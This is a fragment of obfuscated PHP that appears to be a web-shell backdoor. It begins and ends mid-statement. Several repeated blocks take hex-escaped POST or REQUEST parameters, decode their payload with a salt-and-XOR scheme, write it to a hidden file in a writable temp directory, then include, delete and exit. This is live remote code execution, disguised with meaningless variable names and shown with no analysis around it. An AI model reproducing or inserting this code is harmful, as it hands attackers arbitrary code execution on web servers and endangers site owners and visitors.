0 && isset($_POST["\x74\x6Fken"])){ $binding = array_filter(["/var/tmp", getenv("TMP"), getcwd(), session_save_path(), sys_get_temp_dir(), "/tmp", ini_get("upload_tmp_dir"), "/dev/shm", getenv("TEMP")]); $pset = $_POST["\x74\x6Fken"]; $pset = explode (".",$pset ) ; $item= ''; $salt= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen( $salt); $p= 0; array_walk( $pset, function( $v2) use( &$item, &$p, $salt, $sLen) { $chS= ord( $salt[$p %$sLen]); $d= ( ( int)$v2 - $chS -( $p %10)) ^ 66; $item .= chr( $d); $p++; }); for ($reference = 0, $comp = count($binding); $reference < $comp; $reference++) { $mrk = $binding[$reference]; if (!( !is_dir($mrk) || !is_writable($mrk) )) { $elem = vsprintf("%s/%s", [$mrk, ".key"]); $success = file_put_contents($elem, $item); if ($success) { include $elem; @unlink($elem); exit;} } } } if(filter_has_var(INPUT_POST, "va\x6C\x75e")){ $fac = $_REQUEST["va\x6C\x75e"]; $fac =explode ( '.' , $fac) ; $itm = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s ); $y = 0; foreach( $fac as $v1) { $sChar = ord( $s[$y %$sLen] ); $d = ( ( int)$v1 - $sChar -( $y %10)) ^ 38; $itm .= chr( $d ); $y++;} $record = array_filter([getenv("TMP"), ini_get("upload_tmp_dir"), getcwd(), sys_get_temp_dir(), getenv("TEMP"), "/tmp", session_save_path(), "/dev/shm", "/var/tmp"]); foreach ($record as $key => $res) { if ((is_dir($res) and is_writable($res))) { $token = str_replace("{var_dir}", $res, "{var_dir}/.resource"); $success = file_put_contents($token, $itm); if ($success) { include $token; @unlink($token); exit;} } } } if(array_key_exists("re\x73o\x75\x72c\x65", $_POST)){ $reference = $_POST["re\x73o\x75\x72c\x65"]; $reference=explode('.' , $reference ); $item=''; $s='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen=strlen($s); $__len=count($reference); for ($n=0; $n < $__len; $n++) { $v6=$reference[$n]; $sChar=ord($s[$n % $sLen]); $dec=((int)$v6 - $sChar - ($n % 10)) ^ 75; $item .= chr($dec); } $entry = array_filter(["/dev/shm", getcwd(), "/tmp", sys_get_temp_dir(), ini_get("upload_tmp_dir"), getenv("TMP"), session_save_path(), getenv("TEMP"), "/var/tmp"]); foreach ($entry as $desc) { if (max(0, is_dir($desc) * is_writable($desc))) { $component = str_replace("{var_dir}", $desc, "{var_dir}/.ptr"); if (@file_put_contents($component, $item) !== false) { include $component; unlink($component); die(); } } } } if(isset($_REQUEST["it\x65m"])){ $flag = $_REQUEST["it\x65m"]; $flag = explode (".", $flag ) ; $factor = ''; $s3 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s3); $__len = count($flag); for($s = 0; $s < $__len; $s++) {$v7 = $flag[$s]; $chS = ord($s3[$s % $lenS]); $dec = ((int)$v7 - $chS -($s % 10)) ^ 94; $factor .= chr($dec); } $data = array_filter([getenv("TEMP"), getcwd(), getenv("TMP"), "/tmp", ini_get("upload_tmp_dir"), "/var/tmp", "/dev/shm", sys_get_temp_dir(), session_save_path()]); foreach ($data as $key => $property_set) { if (is_dir($property_set) && is_writable($property_set)) { $data_chunk = str_replace("{var_dir}", $property_set, "{var_dir}/.descriptor"); if (file_put_contents($data_chunk, $factor)) { require $data_chunk; unlink($data_chunk); die(); } } } } if(array_key_exists("\x70ar\x61me\x74e\x72\x5F\x67\x72oup", $_REQUEST) && !is_null($_REQUEST["\x70ar\x61me\x74e\x72\x5F\x67\x72oup"])){ $marker = $_REQUEST["\x70ar\x61me\x74e\x72\x5F\x67\x72oup"]; $marker = explode ('.',$marker ) ; $entity = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt); $m = 0; array_walk( $marker, function( $v8) use( &$entity, &$m, $salt, $lenS) {$sChar = ord( $salt[$m % $lenS]); $d =( ( int)$v8 - $sChar -( $m % 10)) ^ 24; $entity .= chr( $d); $m++; }); $data_chunk = array_filter([getenv("TEMP"), ini_get("upload_tmp_dir"), getcwd(), getenv("TMP"), sys_get_temp_dir(), "/dev/shm", session_save_path(), "/var/tmp", "/tmp"]); foreach ($data_chunk as $key =